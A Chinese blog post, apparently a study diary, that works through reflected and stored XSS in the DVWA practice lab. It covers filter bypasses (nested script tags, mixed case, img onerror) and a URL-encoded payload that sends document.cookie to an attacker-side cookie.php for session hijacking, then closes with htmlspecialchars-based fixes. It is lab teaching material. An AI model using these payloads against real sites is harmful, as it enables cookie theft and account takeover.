Lotus's

DVWA学习日记-7 XSS

XSS漏洞

概述
收到一个链接，手一抖就点下去了，发现钱没了，有点类似CSRF，从受害者角度来说都是一样情况，但是从攻击者角度来说不同

XSS
Cross-site scripting
跨站脚本

本质上：
客户端代码注入，通常注入代码是JavaScript区别于命令注入，SQL注入等服务端代码注入

类型：
存储型XSS 攻击代码在数据库里在HTTP响应中
反射型XSS 攻击代码在url里输出在HTTP响应中
DOM型XSS 攻击代码在url里输出在DOM节点中

准备：
Firebox
DVWA
Firebug
Hackbar
Tamper Data

实战
1.进入简单模式
反射XSS

3.进入存储型XSS，发现是个常见的留言板功能

4.先来进入反射型XSS
发现一个框，让我们输入姓名
正常操作

5.尝试< xss >标签

发现hello后面出现了xss标签，似乎可以注入html标签
6.弹窗测试

在firebug查看对应元素

7.JavaScript弹窗函数（根据服务器过滤情况选择）
alert()

confirm()

prompt()

8.攻击思路
用户要登陆被攻击web服务器，攻击者发送攻击url（包含攻击js），诱骗他点击，用户点击后服务器会对攻击js回应，用户浏览器执行js脚本，在用户不知情的情况下，发送凭证到攻击者web下，达到了跨站的目的，攻击者获取到信息，使用用户身份进入到web服务器

9.攻击者web设计
创一个cookie.php
http://127.0.0.1/cookie.php

构造攻击js


document.localtion	将页面内容定位到指定的位置
document.cookie		读取cookie

构造攻击url（等于提交表单）

http://localhost/DVWA-master/vulnerabilities/xss_r/?name=

还需要使用到url编码

http://localhost/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E

10.发送url给用户，获取cookie
http://127.0.0.1/cookie.txt里面就有内容了

修改自己的cookie值就可以受害者的号登陆

11.进入中等难度
尝试发现没有成功，服务端过滤了script标签

12.发现只过滤了一次script标签
尝试使用ipt>标签，发现成功弹窗

?name=ipt>alert(/xss/)

也可以使用大小写混合法，进行绕过

?name=#

13.进入高难度模式
使用了两种绕过也不行
发现只是限制了script标签，我们可以使用其他标签
发现img标签也可以执行js脚本

?name=	//img标签
?name=  //ifrname标签
</code></pre> 
  <p>14.最后来到无漏洞模式<br> 查看源代码<br> <a href="http://img.e-com-net.com/image/info8/80e3fc7db48b411e98aa718ef1d3ee3c.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/80e3fc7db48b411e98aa718ef1d3ee3c.png" alt="DVWA学习日记-7 XSS_第12张图片" width="721" height="254" style="border:1px solid black;"></a><br> 发现了htmlspecialchars函数<br> 这个函数可以将<br> 这个函数默认不编译单引号</p> 
  <pre><code>& => &amp;
" => &quot
' => &apos;
< => &lt;
> => &gt;
</code></pre> 
  <p>15.来到存储型XSS<br> <a href="http://img.e-com-net.com/image/info8/b419e672f2e4433f9901768939ccf65f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b419e672f2e4433f9901768939ccf65f.jpg" alt="DVWA学习日记-7 XSS_第13张图片" width="650" height="371" style="border:1px solid black;"></a><br> 16.前段限制了输入长度<br> 我们用firebug查看<br> <a href="http://img.e-com-net.com/image/info8/95203ab726bd4390a0262d132660a798.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/95203ab726bd4390a0262d132660a798.jpg" alt="DVWA学习日记-7 XSS_第14张图片" width="650" height="160" style="border:1px solid black;"></a><br> 使用tamper data进行成功绕过<br> <a href="http://img.e-com-net.com/image/info8/c3af2db5c492463cb8246eead5eb1c61.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c3af2db5c492463cb8246eead5eb1c61.jpg" alt="DVWA学习日记-7 XSS_第15张图片" width="600" height="600" style="border:1px solid black;"></a><br> 17.因为存储型数据库对数据库可能会有影响<br> 所以我们重置一下数据库<br> <a href="http://img.e-com-net.com/image/info8/b39e04b0fbbd4a6f9113629b1d429904.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b39e04b0fbbd4a6f9113629b1d429904.jpg" alt="DVWA学习日记-7 XSS_第16张图片" width="650" height="600" style="border:1px solid black;"></a></p> 
  <p>18.进入中等难度存储XSS<br> 使用大小写混合法成功绕过<br> name成功注入<br> message注入失败</p> 
  <p>19.进入高难度等级<br> 使用img标签<br> 而name成功，message注入失败</p> 
  <pre><code>img src=x onerror=alert(1)>
</code></pre> 
  <p>20.进入无漏洞模式<br> 输入我们的特殊符号<br> <a href="http://img.e-com-net.com/image/info8/2598e455c17444a386b9739aba7149e7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/2598e455c17444a386b9739aba7149e7.jpg" alt="DVWA学习日记-7 XSS_第17张图片" width="650" height="267" style="border:1px solid black;"></a><br> 同样使用htmlspecialchars<br> 不仅这样还是用了mysql_real_escape_string对单引号进行转义，防止sql注入</p> 
  <p><strong>修复</strong><br> 输入过滤<br> 不建议黑名单，应使用白名单</p> 
  <p>最重要的是输出过滤<br> HTML编码<br> JS转义</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1188434444680273920"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(DVWA)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1943666130308624384.htm"
                           title="【DVWA系列】——SQL注入（时间盲注）详细教程" target="_blank">【DVWA系列】——SQL注入（时间盲注）详细教程</a>
                        <span class="text-muted">一只枷锁</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1.htm">靶场练习</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>本文仅用于技术研究，禁止用于非法用途。Author:枷锁文章目录一、时间盲注核心原理二、手工注入步骤（附Payload）1.判断注入类型（字符型/数字型）2.猜解数据库名长度3.逐字符猜解数据库名4.猜解表名5.提取关键数据（以admin密码为例）三、自动化工具（sqlmap）1.基础命令2.常用操作四、防御措施分析（Low级别漏洞根源）总结：攻击链与技巧本文环境SecurityLevel：low</div>
                    </li>
                    <li><a href="/article/1943009974405885952.htm"
                           title="DVWA靶场-SQL Injection (Blind)SQL注入盲注" target="_blank">DVWA靶场-SQL Injection (Blind)SQL注入盲注</a>
                        <span class="text-muted">mlws1900</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a>
                        <div>概念SQLInjection（Blind），即SQL盲注；注入：可以查看到详细内容；盲注：目标只会回复是或不是，没有详细内容；盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。类型基于布尔值的盲注；基于时间的盲注；基于报错的盲注；基于布尔值的盲注基于布</div>
                    </li>
                    <li><a href="/article/1943007959097339904.htm"
                           title="【web安全】SQLMap 参数深度解析：--risk 与 --level 详解" target="_blank">【web安全】SQLMap 参数深度解析：--risk 与 --level 详解</a>
                        <span class="text-muted"></span>

                        <div>目录简介一、--risk参数：测试风险控制1.基本定义2.各级别详细对比risk=1(默认)risk=2risk=33.使用建议二、--level参数：测试深度控制1.基本定义2.各级别详细对比level=1(默认)level=2level=3level=4level=53.技术实现差异4.使用建议三、参数组合策略1.经典组合方案2.DVWAHigh级别推荐四、性能与效果对比1.测试数据统计2.资</div>
                    </li>
                    <li><a href="/article/1933823377571639296.htm"
                           title="【DVWA系列】——JavaScript——High详细教程" target="_blank">【DVWA系列】——JavaScript——High详细教程</a>
                        <span class="text-muted">枷锁—sha</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1.htm">靶场练习</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>本文仅用于技术研究，禁止用于非法用途。Author:枷锁文章目录漏洞核心原理分析Token生成流程（还原后）完整Token生成路径逐步攻击教程方法一：控制台手动执行方法二：分步计算Token值方法三：自动化攻击脚本技术原理详解防御措施与修复建议防御措施与修复方案1.根本漏洞原因2.安全方案各安全级别防御对比本文环境SecurityLevel：High以下是针对DVWA（DamnVulnerable</div>
                    </li>
                    <li><a href="/article/1930235578234761216.htm"
                           title="DVWA——Insecure CAPTCHA复现" target="_blank">DVWA——Insecure CAPTCHA复现</a>
                        <span class="text-muted">霞日</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>DVWA——InsecureCAPTCHA复现原理CAPTCHA是谷歌提供的一种用户验证服务，即：验证码验证，就是用来区分人类和计算机的一种手段，可以很有效的防止恶意软件、“肉鸡”大量调用系统功能，比如注册、登录等。因为该模块是谷歌提供，需要科学上网，否则我们无法看到具体的页面数据，修改成功，验证码等对于我们常用的bruteforce（暴力攻击），由于这个时候系统有个严密的验证码机制，此类攻击就无</div>
                    </li>
                    <li><a href="/article/1930233181647204352.htm"
                           title="DVWA关卡6：Insecure CAPTCHA（不安全的验证码）" target="_blank">DVWA关卡6：Insecure CAPTCHA（不安全的验证码）</a>
                        <span class="text-muted">景天zy</span>
<a class="tag" taget="_blank" href="/search/DVWA%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%B6%E5%9C%BA/1.htm">DVWA渗透测试靶场</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>目录LowMediumHighImpossibleInsecureCAPTCHA，意思是不安全的验证码，CAPTCHA是CompletelyAutomatedPublicTuringTesttoTellComputersandHumansApart(全自动区分计算机和人类的图灵测试)的简称。但个人觉得，这一模块的内容叫做不安全的验证流程更妥当些，因为这块主要是验证流程出现了逻辑漏洞，谷歌的验证码表</div>
                    </li>
                    <li><a href="/article/1901115220986753024.htm"
                           title="7.探索XSS跨站脚本攻击" target="_blank">7.探索XSS跨站脚本攻击</a>
                        <span class="text-muted">早安TnT</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E8%AE%A1%E5%88%92%EF%BC%88%E6%AF%8F%E6%97%A5%E8%AE%A1%E5%88%92%EF%BC%89/1.htm">网络安全学习计划（每日计划）</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>探索XSS跨站脚本攻击第一部分：XSS基础（理论）第二部分：XSS的手工测试（理论）第三部分：DVWA靶场实践XSS（实践）总结目标：•理解XSS的基本原理与类型•掌握XSS的手工测试方法•通过DVWA靶场实践XSS攻击详细内容与教学第一部分：XSS基础（理论）学习内容：•什么是XSS？•XSS的类型•XSS的危害详细讲解：1什么是XSS？XSS（Cross-SiteScripting，跨站脚本攻</div>
                    </li>
                    <li><a href="/article/1898712588238254080.htm"
                           title="网络安全工具汇总" target="_blank">网络安全工具汇总</a>
                        <span class="text-muted">Hacker_Fuchen</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication（漏洞练习平台）https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.</div>
                    </li>
                    <li><a href="/article/1898452611510628352.htm"
                           title="DVWA靶场SQL Injection-Bool注入（盲注）" target="_blank">DVWA靶场SQL Injection-Bool注入（盲注）</a>
                        <span class="text-muted">fqefeq</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                        <div>1.判断注入点1exists1'missing(以下的图片同上，不过多陈述)2.判断类型1and1=1#exists1and1=2#exists不是数字型1'and1=1#exists1'and1=2#missing是字符型3.爆数据库名（1）爆数据库名的长度1'andlength(database())>10#missing1'andlength(database())>5#missing1'a</div>
                    </li>
                    <li><a href="/article/1894001973473112064.htm"
                           title="DVWA 靶场(含代码审计)" target="_blank">DVWA 靶场(含代码审计)</a>
                        <span class="text-muted">AaWeiAa</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/file/1.htm">file</a><a class="tag" taget="_blank" href="/search/inclusion/1.htm">inclusion</a><a class="tag" taget="_blank" href="/search/file/1.htm">file</a><a class="tag" taget="_blank" href="/search/upload/1.htm">upload</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a>
                        <div>DVWA靶场的通关刚建立和使用输入http://dvwa:8898/setup.php//进入用户名密码dvwa你自己设计的想要进入数据库点击creat用户名密码adminpasswordAttacktypeSniper模式在Sniper模式下，Payload字典用于逐个替换请求中标记的位置。例如，如果一个表单需要用户名和密码，Sniper会依次尝试不同的用户名和密码组合，直到找到有效的登录凭证或</div>
                    </li>
                    <li><a href="/article/1892770446659612672.htm"
                           title="DVWA指点迷津-XSS(DOM)" target="_blank">DVWA指点迷津-XSS(DOM)</a>
                        <span class="text-muted">肉肉球麻里</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/1.htm">安全漏洞</a>
                        <div>DOMBasedXSS特点既可能是反射型，也可能是存储型。利用前端的DOM树来造成XSS攻击。漏洞危害泄露用户的Cooike泄露用户的IP地址、浏览器信息篡改网页XSS钓鱼DVWALow应用防御措施仅有前端代码，服务器无任何防御措施攻击方式通过修改URL传递参数，构造XSS测试payloadPayload:?default=alert('xss')Medium应用防御措施服务器做了对“script</div>
                    </li>
                    <li><a href="/article/1892764014996418560.htm"
                           title="DVWA - XSS DOM (medium)" target="_blank">DVWA - XSS DOM (medium)</a>
                        <span class="text-muted">S1xTwe1ve</span>
<a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a>
                        <div>随便在选项里选一个，url中会出现我们选的哪个。看看可不可以用alert(document.cookie)127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=alert(document.cookie)发现不会执行，而且语句也没有在url中显示，只显示English应该是过滤了方法一换一个试一下127.0</div>
                    </li>
                    <li><a href="/article/1890632543317848064.htm"
                           title="python——脚本实现检测目标ip是否存在文件包含漏洞" target="_blank">python——脚本实现检测目标ip是否存在文件包含漏洞</a>
                        <span class="text-muted">xiaochuhe--kaishui</span>
<a class="tag" taget="_blank" href="/search/Python%E7%88%AC%E8%99%AB/1.htm">Python爬虫</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>python爬虫——request模块（一）_xiaochuhe的博客-CSDN博客_pythonrequestpython——正则表达式（一）_xiaochuhe的博客-CSDN博客举例dvwa——FileInclusion代码如下：importrequestsimportreurl=input("请输入需要检测的网址：&#</div>
                    </li>
                    <li><a href="/article/1890393804679213056.htm"
                           title="CSRF +self xss的运用【DVWA测试】" target="_blank">CSRF +self xss的运用【DVWA测试】</a>
                        <span class="text-muted">Miracle_ze</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>CSRF+SelfXSSCSRF漏洞SelfXSSDVWA对CSRF+selfxss的运用靶场环境与工具1、使用工具创建恶意网页2、构造xss语句3、构造第二种xss语句CSRF漏洞产生原因：由于服务器未对客户端用户正确的身份校验，导致用户可以任意提交文件防御：加上身份校验，添加token值cookie的token值进行防御。在注册用户的时候服务器会生成token。短链接是可以隐藏网站真正目的，比</div>
                    </li>
                    <li><a href="/article/1828309174459658240.htm"
                           title="DVWA通关之File Upload" target="_blank">DVWA通关之File Upload</a>
                        <span class="text-muted">CoOlCoKeZ</span>

                        <div>文件上传FileUpload，通常是由于对上传文件的类型，内容没有进行严格的过滤，检查，使得攻击者可以通过上传木马获取服务器的webshell权限，因此文件上传带来的危害常常是毁灭性的，Apache，Tomcat，Nginx等都爆出过文件上传漏洞。利用文件上传，我们可以上传我们的一句话木马，很方便的会获得系统shell。Low：源码分析一下:Yourimagewasnotuploaded.';}e</div>
                    </li>
                    <li><a href="/article/1826883277261205504.htm"
                           title="DVWA靶场通关（CSRF）" target="_blank">DVWA靶场通关（CSRF）</a>
                        <span class="text-muted">马船长</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>CSRF是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。漏洞利用前提：:用户必须登录、黑客懂得一些发包的请求,服务器端是不会有二次认证的，被害者是不知情的</div>
                    </li>
                    <li><a href="/article/1759817712873336832.htm"
                           title="DVWA 靶场之 Brute Force-Low&Medium（前期配置铺垫与渗透方法及源码分析）" target="_blank">DVWA 靶场之 Brute Force-Low&Medium（前期配置铺垫与渗透方法及源码分析）</a>
                        <span class="text-muted">Myon⁶</span>
<a class="tag" taget="_blank" href="/search/DVWA%E9%9D%B6%E5%9C%BA/1.htm">DVWA靶场</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/1.htm">暴力破解</a><a class="tag" taget="_blank" href="/search/burpsuite/1.htm">burpsuite</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%90%86%E6%A8%A1%E5%BC%8F/1.htm">代理模式</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a>
                        <div>首先登录DVWA靶场DVWA默认的用户有5个，用户名及密码如下：admin/passwordgordonb/abc1231337/charleypablo/letmeinsmithy/password难度等级设置为low，我们先从最简单的开始来到BruteForce（暴力破解）我们可以输入用户名和密码简单测了几个，回显用户名或密码不正确但是并未对我们输入的内容及次数进行限制，因此直接进行爆破暴力破</div>
                    </li>
                    <li><a href="/article/1759734678933303296.htm"
                           title="w28DVWA-csrf实例" target="_blank">w28DVWA-csrf实例</a>
                        <span class="text-muted">杭城我最帅</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a>
                        <div>DVWA-csrf实例low级别修改密码：修改的密码通过get请求，暴露在url上。写一个简单的html文件，里面伪装修改密码的文字，代码如下：dvwa-csrf-low点击"dvwa-csrf-low"文字后，跳转到dvwa的修改密码界面，提示Passwordchanged（密码已修改）。middle级别修改密码：修改的密码通过get请求，暴露在url上。写一个简单的html文件，里面伪装修改密</div>
                    </li>
                    <li><a href="/article/1759734552575700992.htm"
                           title="w25 web漏洞之xss" target="_blank">w25 web漏洞之xss</a>
                        <span class="text-muted">杭城我最帅</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a>
                        <div>pikachu靶场第一关-反射型xss（get）利用hpp漏洞破解第二关-反射型xss（post）登录：admin/123456修改postdata内的参数第三关-存储型xss在留言板输入message=alert(1)第四关-DOM型xsswhatdoyousee?是把输入框内的内容拼接url。常见XSS语句标签,xssxss第五关-DOM型xss跟第四关一样dvwa靶场第一关-xss(Refl</div>
                    </li>
                    <li><a href="/article/1759442621308153856.htm"
                           title="干货 | 绕过WAF的常见Web漏洞利用分析" target="_blank">干货 | 绕过WAF的常见Web漏洞利用分析</a>
                        <span class="text-muted">网络安全大白</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2/1.htm">黑客</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a>
                        <div>前言本文以最新版安全狗为例，总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法，希望能起到抛砖引玉的效果。如果师傅们有更好的方法，烦请不吝赐教。PS：本文仅用于技术研究与讨论，严禁用于任何非法用途，违者后果自负，作者与平台不承担任何责任测试环境PHPStudy（PHP5.4.45+Apache+MySQL5.5.53）+最新版安全狗（4.0.28330）靶场使用DVWA：http://</div>
                    </li>
                    <li><a href="/article/1756434785334476800.htm"
                           title="docker 靶场安装" target="_blank">docker 靶场安装</a>
                        <span class="text-muted">KEEPMA</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a>
                        <div>DVWA安防环境dockerpullsagikazarmark/dvwadockerrun-d--namedvwa-lin-p8080:80-p3306:3306sagikazarmark/dvwadockerrun-d--namedvwa-lin-p8080（物理机）:80（docker）-p3306:3306（mysql）sagikazarmark/dvwapikachu安防环境dockerp</div>
                    </li>
                    <li><a href="/article/1755897264993222656.htm"
                           title="手把手教你在Kali Linux下搭建dvwa平台" target="_blank">手把手教你在Kali Linux下搭建dvwa平台</a>
                        <span class="text-muted">JohnRykZen</span>

                        <div>一、安装xmapp下载地址：XAMPPInstallersandDownloadsforApacheFriends选择linux版本，下载下来是一个.run文件终端打开.run文件所在目录，chmod755文件名.run加上可执行权限，然后./xxx.run运行run文件，非kali要加sudo。然后会出现安装向导，一路next等待安装完成二、启动MySQL和Apache服务开启服务，注意如果开启</div>
                    </li>
                    <li><a href="/article/1755808372696825856.htm"
                           title="Low 级别反射型 XSS 攻击演示（附链接）" target="_blank">Low 级别反射型 XSS 攻击演示（附链接）</a>
                        <span class="text-muted">香甜可口草莓蛋糕</span>
<a class="tag" taget="_blank" href="/search/XSS/1.htm">XSS</a><a class="tag" taget="_blank" href="/search/%E6%94%BB%E5%87%BB/1.htm">攻击</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a>
                        <div>环境准备如何搭建DVWA靶场保姆级教程（附链接）https://eclecticism.blog.csdn.net/article/details/135834194?spm=1001.2014.3001.5502测试打开DVWA靶场并登录，找到反射型XSS页面（笔者这里是Low级别）先右键检查输入框属性代码如下：What'syourname?:name="XSS":表单的名称为"XSS"。act</div>
                    </li>
                    <li><a href="/article/1755467479221551104.htm"
                           title="绕过安全狗" target="_blank">绕过安全狗</a>
                        <span class="text-muted">Lyx-0607</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>本节我们想要绕过的安全狗版本为v4.023957，它是网站安全狗的Apache版。首先搭建环境。渗透环境选用DVWA漏洞集成环境，下载地址为http://www.dvwa.co.uk/。DVWA是一款集成的渗透测试演练环境，当刚刚入门并且找不到合适的靶机时，可以使用DVWA，它的搭建非常简便。如图8-1所示为DVWA的下载页面。图8-1下载DVWA下载完的文件是一个个压缩包，因为DVWA是建立在P</div>
                    </li>
                    <li><a href="/article/1755427653009031168.htm"
                           title="接上一篇dvwa学习，今天写Brute Force Source（暴力破解）" target="_blank">接上一篇dvwa学习，今天写Brute Force Source（暴力破解）</a>
                        <span class="text-muted">yujian404</span>
<a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E4%BA%8C%E6%8A%8A%E5%88%80/1.htm">二把刀</a>
